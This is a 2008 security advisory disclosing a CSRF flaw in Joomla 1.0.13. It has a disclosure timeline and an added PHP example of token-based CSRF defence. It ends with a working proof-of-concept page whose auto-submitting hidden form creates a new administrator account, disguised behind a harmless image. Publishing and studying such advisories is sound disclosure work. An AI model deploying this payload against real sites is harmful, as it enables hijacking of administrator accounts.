SECURITYVULNS:DOC:18825 (securityvulns, via vulners.com) - Jan 09, 2008

Joomla 1.0.13 CSRF


Author: Jose Carlos Nieto.

Date: Jan 08, 2008

Severity: Mild

There exists a Cross-Site Request Forgery (CSRF) security hole in Joomla 1.0.13.

Background

Joomla! is a free <http://en.wikipedia.org/wiki/Free_software>, open source <http://en.wikipedia.org/wiki/Open_source_software> content management system <http://en.wikipedia.org/wiki/Content_management_system> for publishing content
on the world wide web <http://en.wikipedia.org/wiki/World_wide_web> and intranets <http://en.wikipedia.org/wiki/Intranet>.
Joomla! is licensed under the GPL <http://en.wikipedia.org/wiki/GNU_General_Public_License>, and is the result of a fork <http://en.wikipedia.org/wiki/Fork_%28software_development%29> of Mambo <http://en.wikipedia.org/wiki/Mambo_%28CMS%29>.

Severity

Mild. It requires an administrator to be logged in and to be tricked into visiting a specially
crafted webpage.

Summary

Joomla! has no CSRF protection. A malicious user can trick an administrator into viewing
a specially crafted webpage containing an exploit; that exploit can then perform, without the
administrator's consent, any action the administrator would normally be able to perform, such as
publishing content or even adding a new administrator.

Solution

This problem has no solution at this time.
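The advisory offers no vendor fix. As an added example, not code from the advisory or from Joomla itself, the following shows the standard synchronizer-token defence that blocks the kind of forged admin request described in the Summary: every state-changing admin form carries a per-session secret token, the handler compares it in constant time, and a secondary Origin/Referer check fails closed. It assumes PHP 7 or later (random_bytes, hash_equals), a session-backed admin login, and the hypothetical function names, site name and sample requests used below.

```php
<?php
// Added example: synchronizer-token CSRF protection for a PHP admin form.
// Not Joomla's own code; function names, the session key and the site name
// are assumptions. The token lives in the administrator's session, so a form
// submitted from a third-party page cannot supply it.

declare(strict_types=1);

/**
 * Return the CSRF token for the current session, creating one if needed.
 * random_bytes() yields CSPRNG output; bin2hex() makes it safe for a form field.
 */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden input to embed in every state-changing admin form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Verify a submitted token against the session copy.
 * hash_equals() compares in constant time so the check does not leak by timing.
 * A missing token, a non-string (e.g. csrf_token[]=...) or an empty session
 * value all fail closed.
 */
function csrf_check(array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if (!is_string($given) || !is_string($expected) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

/**
 * Secondary check: a state-changing POST should arrive with an Origin header
 * (or, for older browsers, a Referer) matching our own site. If neither header
 * is present the request is rejected rather than trusted.
 */
function origin_ok(array $server, string $allowedOrigin): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin === null && isset($server['HTTP_REFERER'])) {
        $parts = parse_url($server['HTTP_REFERER']);
        if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
            return false;
        }
        $origin = $parts['scheme'] . '://' . $parts['host']
                . (isset($parts['port']) ? ':' . $parts['port'] : '');
    }
    return $origin !== null && $origin === $allowedOrigin;
}

/**
 * Gate for a user-save handler (assumed name). Both checks must pass before
 * any of the real save logic runs.
 */
function handle_user_save(array $post, array $session, array $server): string
{
    if (!origin_ok($server, 'http://joomlasite.com') || !csrf_check($post, $session)) {
        return 'Request rejected: missing or invalid CSRF token / origin';
    }
    // ... the application's existing save logic would run here ...
    return 'User saved';
}

// Constructed demo requests (not real traffic): a cross-site form post carries
// no token and a foreign Origin, so it is rejected; a genuine admin submission
// from the site's own form passes.
$session = ['csrf_token' => bin2hex(random_bytes(32))];
$forged  = ['username' => 'custom_username', 'task' => 'save'];
$genuine = $forged + ['csrf_token' => $session['csrf_token']];

echo handle_user_save($forged,  $session, ['HTTP_ORIGIN' => 'http://other-site.example']), "\n";
echo handle_user_save($genuine, $session, ['HTTP_ORIGIN' => 'http://joomlasite.com']), "\n";
```

The token check is the primary control; the Origin/Referer check is defence in depth, since some clients strip Referer for privacy and the handler therefore has to treat an absent header as a failure rather than a pass.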

Disclosure timeline

Oct 18 2007 - Vulnerability found.
Oct 18 2007 - Vulnerability reported to vendor.
Oct 18 2007 - Answer from vendor.
Jan 08 2008 - Advisory released.

Proof of Concept

If a logged-in administrator visits this page, a new administrator account is added to the victim's
Joomla-powered website.

---- exploit code ----

<script type="text/javascript">
window.onload = function() {
var url = "http://joomlasite.com/joomla/administrator/index2.php";

var gid = 25;
var user = 'custom_username';
var pass = 'custom_password';
var email = '[email protected]';
var param = {
    name: user,
    username: user,
    email: email,
    password: pass,
    password2: pass,
    gid: gid,
    block: 0,
    option: 'com_users',
    task: 'save',
    sendEmail: 1
};

var form = document.createElement('form');
form.action = url;
form.method = 'post';
form.target = 'hidden';
form.style.display = 'none';

for (var i in param) {
    try {
        // ie
        var input = document.createElement('<input name="'+i+'">');
    } catch(e) {
        // other browsers
        var input = document.createElement('input');
        input.name = i;
    }
    input.setAttribute('value',  param[i]);
    form.appendChild(input);
}
document.body.appendChild(form);

form.submit();
}
</script>

<iframe name="hidden" style="display: none"></iframe>

<img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg">

---- exploit code ----